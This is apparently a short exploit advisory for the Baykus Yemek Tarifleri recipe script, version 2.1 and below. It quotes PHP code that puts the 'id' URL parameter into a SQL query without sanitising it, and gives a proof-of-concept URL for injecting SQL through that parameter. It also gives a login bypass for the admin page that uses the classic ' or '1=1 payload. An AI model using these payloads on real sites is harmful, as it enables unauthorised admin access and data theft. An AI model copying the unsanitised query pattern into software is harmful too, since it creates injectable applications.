Baykus Yemek Tarifleri versions 2.1 and below suffer from a remote SQL injection vulnerability.
49ccbbd6d5b9d4c1555984c8e0b04fc87d6ac460bb51fd9dbf81534cd187042c
# Baykus Yemek Tarifleri <= 2.1 SQL Injection Vulnerability
# By cr4wl3r
# Download: http://scripti.org/i/Yemek.rar
############################################################
# Code:
include("ayar.php");
$ids= $_GET["id"];
$yaz= mysql_fetch_array(mysql_query("select * from tarifler where id='$ids'"));
mysql_select_db("yemek");
mysql_query("SET NAMES ´latin5´");
mysql_query("SET CHARACTER SET latin5");
$baslik= $yaz["baslik"];
$resim = $yaz['resim'];
if($resim==""){
$resim= "bos.png";
}
$kisa= $yaz["kisa"];
$tarif= $yaz["metin"];
############################################################
# PoC: [path]/oku.php?id=[SQL]
############################################################
# Auth Bypass
# [path]/Admin/giris.php
# Username: ' or '1=1
# password: ' or '1=1
############################################################